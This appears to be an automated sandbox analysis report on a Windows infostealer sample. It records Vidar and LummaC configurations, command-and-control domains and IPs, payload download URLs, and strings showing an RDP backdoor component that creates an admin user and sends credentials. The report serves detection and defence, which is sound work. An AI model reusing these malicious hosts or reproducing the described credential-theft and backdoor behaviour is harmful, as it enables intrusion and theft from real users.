                                Source: stogeneratmns.shopAvira URL Cloud: Label: malware
                                Source: https://reinforcenh.shop/apiAvira URL Cloud: Label: malware
                                Source: https://5.75.211.162/vcruntime140.dllAvira URL Cloud: Label: malware
                                Source: https://5.75.211.162/sqlp.dllBAvira URL Cloud: Label: malware
                                Source: wallkedsleeoi.shopAvira URL Cloud: Label: malware
                                Source: https://5.75.211.162/sqlp.dllVAvira URL Cloud: Label: malware
                                Source: https://steamcommunity.com/profiles/76561199780418869.Avira URL Cloud: Label: malware
                                Source: https://fragnantbui.shop/Avira URL Cloud: Label: malware
                                Source: https://stogeneratmns.shop/Avira URL Cloud: Label: malware
                                Source: fragnantbui.shopAvira URL Cloud: Label: malware
                                Source: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeAvira URL Cloud: Label: malware
                                Source: offensivedzvju.shopAvira URL Cloud: Label: malware
                                Source: https://stogeneratmns.shop/api1Avira URL Cloud: Label: malware
                                Source: https://stogeneratmns.shop:443/apiAvira URL Cloud: Label: malware
                                Source: https://5.75.211.162/mozglue.dllXAvira URL Cloud: Label: malware
                                Source: https://steamcommunity.com/profiles/76561199780418869/inventory/Avira URL Cloud: Label: malware
                                Source: https://5.75.211.162/gAvira URL Cloud: Label: malware
                                Source: https://steamcommunity.com/profiles/76561199780418869Avira URL Cloud: Label: malware
                                Source: https://drawzhotdog.shop:443/api:Avira URL Cloud: Label: malware
                                Source: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;Avira URL Cloud: Label: malware
                                Source: https://fragnantbui.shop:443/apiAvira URL Cloud: Label: malware
                                Source: https://5.75.211.162/:3#Avira URL Cloud: Label: malware
                                Source: https://5.75.211.162/freebl3.dlllAvira URL Cloud: Label: malware
                                Source: https://reinforcenh.shop/apiOAvira URL Cloud: Label: malware
                                Source: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;Avira URL Cloud: Label: malware
                                Source: http://147.45.44.104Avira URL Cloud: Label: malware
                                Source: https://5.75.211.162/softokn3.dllAvira URL Cloud: Label: malware
                                Source: https://reinforcenh.shop/.itbAvira URL Cloud: Label: malware
                                Source: https://stogeneratmns.shop/apiAvira URL Cloud: Label: malware
                                Source: https://ghostreedmnu.shop/apiAvira URL Cloud: Label: malware
                                Source: https://5.75.211.162/Avira URL Cloud: Label: malware
                                Source: C:\ProgramData\AFHDGDGIID.exeAvira: detection malicious, Label: HEUR/AGEN.1311769
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5d9ab0d4c7_rdp[1].exeAvira: detection malicious, Label: HEUR/AGEN.1311769
                                Source: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "e90840a846d017e7b095f7543cdf2d15"}
                                Source: 8.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["ghostreedmnu.shop", "wallkedsleeoi.shop", "stogeneratmns.shop", "fragnantbui.shop", "reinforcenh.shop", "gutterydhowi.shop", "drawzhotdog.shop", "offensivedzvju.shop", "vozmeatillu.shop"], "Build id": "H8NgCl--"}
                                Source: C:\Program Files\RDP Wrapper\rdpwrap.dllReversingLabs: Detection: 54%
                                Source: C:\ProgramData\GIIIIJDHJE.exeReversingLabs: Detection: 42%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5db9e54794_vfkagks[1].exeReversingLabs: Detection: 42%
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeReversingLabs: Detection: 47%
                                Source: file.exeReversingLabs: Detection: 42%
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                Source: C:\ProgramData\AFHDGDGIID.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5d9ab0d4c7_rdp[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoe Sandbox ML: detected
                                Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: reinforcenh.shop
                                Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: stogeneratmns.shop
                                Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fragnantbui.shop
                                Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: drawzhotdog.shop
                                Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: vozmeatillu.shop
                                Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: offensivedzvju.shop
                                Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ghostreedmnu.shop
                                Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: gutterydhowi.shop
                                Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wallkedsleeoi.shop
                                Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                                Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                                Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                                Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                                Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                                Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: H8NgCl--
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,2_2_004080A1
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00408048
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,2_2_00411E5D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,2_2_0040A7D8
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0F6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,2_2_6C0F6C80
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C24A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,2_2_6C24A9A0
                                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.ini
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.dll
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49739 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.4:49740 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.36.139:443 -> 192.168.2.4:49766 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.4:49767 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49768 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49770 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49771 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.4:49773 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49776 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49777 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.4:49779 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49780 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.128.144:443 -> 192.168.2.4:49781 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49785 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49786 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.4:49787 version: TLS 1.2
                                Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr
                                Source: Binary string: freebl3.pdb source: RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                                Source: Binary string: freebl3.pdbp source: RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                                Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr
                                Source: Binary string: c:\rje\tg\vlt\obj\Release\ojc.pdb source: IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr
                                Source: Binary string: costura.costura.pdb.compressedlB^q source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.dr
                                Source: Binary string: costura.costura.pdb.compressed source: AFHDGDGIID.exe, 0000000C.00000000.2399577168.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp, AFHDGDGIID.exe.2.dr, 66f5d9ab0d4c7_rdp[1].exe.2.dr
                                Source: Binary string: rdpclip.pdbJ source: RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.dr
                                Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
                                Source: Binary string: <>c__DisplayClass0_0<GenerateRandomPassword>b__0<>u__1IEnumerable`1Task`1TaskAwaiter`10xb11a1<>u__2Func`2Dictionary`2<Main>d__5get_UTF8<Module><Main>Q2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBSystem.IOGetPublicIP_Costuracostura.metadatamscorlibSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedNewGuidReadToEndExecuteCommandcommandGenerateRandomPasswordpasswordNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheEnumerableIDisposableget_AsyncWaitHandleDownloadFileget_NamefullNameGetAdminGroupNameGetNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValueadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringSubstringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamset_ItemSystemSymmetricAlgorithmHashAlgorithmRandomrandomICryptoTransformTimeSpanIsPortOpenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionset_PositionSetExceptionStringComparisonusernamePatternpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__buildersenderResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsget_CharsProcessSystem.Net.SocketsExistsOpen.NatConcatObjectSelectBeginConnectSystem.NetWaitForExitIAsyncResultGetResultSetResultToLowerInvariantWebClientTcpClientEnvironmentStartConvertRDPPortportget_StandardOutputset_RedirectStandardOutputExecuteCommandWithOutputMoveNextSystem.Textset_CreateNoWindowToArrayset_KeyContainsKeySystem.Security.CryptographyResolveAssemblyReadExistingAssemblyGetExecutingAssemblyIsNullOrEmptyWj66qRZAtguDUcGmA5
                                Source: Binary string: RfxVmt.pdb source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.000000000301A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, rfxvmt.dll.19.dr, RDPWInst.exe.12.dr
                                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000002.00000002.2520015830.0000000037B54000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000002.00000002.2498836602.000000002BC7A000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
                                Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr
                                Source: Binary string: rdpclip.pdb source: RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.dr
                                Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2833427275.000000001FE3B000.00000002.00001000.00020000.00000000.sdmp
                                Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr
                                Source: Binary string: RfxVmt.pdbGCTL source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.000000000301A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, rfxvmt.dll.19.dr, RDPWInst.exe.12.dr
                                Source: Binary string: c:\rje\tg\ps7uj1z\obj\Release\ojc.pdb source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr
                                Source: Binary string: softokn3.pdb source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
                                Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: AFHDGDGIID.exe, 0000000C.00000000.2399577168.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp, AFHDGDGIID.exe.2.dr, 66f5d9ab0d4c7_rdp[1].exe.2.dr
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_0041543D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,2_2_00414CC8
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00409D1C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040D5C6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040B5DF
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401D80
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040BF4D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00415FD1
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040B93F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00415B0B
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040CD37
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,2_2_00415142
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]2_2_004014AD
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax2_2_004014AD
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then xor eax, eax8_2_0040F042
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_0040D470
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+01h], 00000000h8_2_0040F807
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h8_2_00447AC9
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_00447AC9
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+14h]8_2_00447D38
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2EE0190Fh8_2_00447E1B
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, esi8_2_00401000
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h8_2_0044B010
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_00425030
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add ecx, dword ptr [esp+eax*4+30h]8_2_0040C1C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h8_2_0044B1A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx8_2_00427230
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]8_2_004452E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]8_2_004142E4
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah8_2_0044B320
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]8_2_00407450
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al8_2_00412450
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+08h]8_2_00412450
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+08h]8_2_00412450
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al8_2_00412450
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]8_2_00442410
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_0044B430
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h8_2_004314A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h8_2_004404AB
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_0044A510
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], cl8_2_00435519
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_00433623
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh8_2_00449620
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_00434629
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+01h], 00000000h8_2_0040F63A
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h8_2_00414692
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+00000668h]8_2_0041E71A
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 77DD2217h8_2_0041E71A
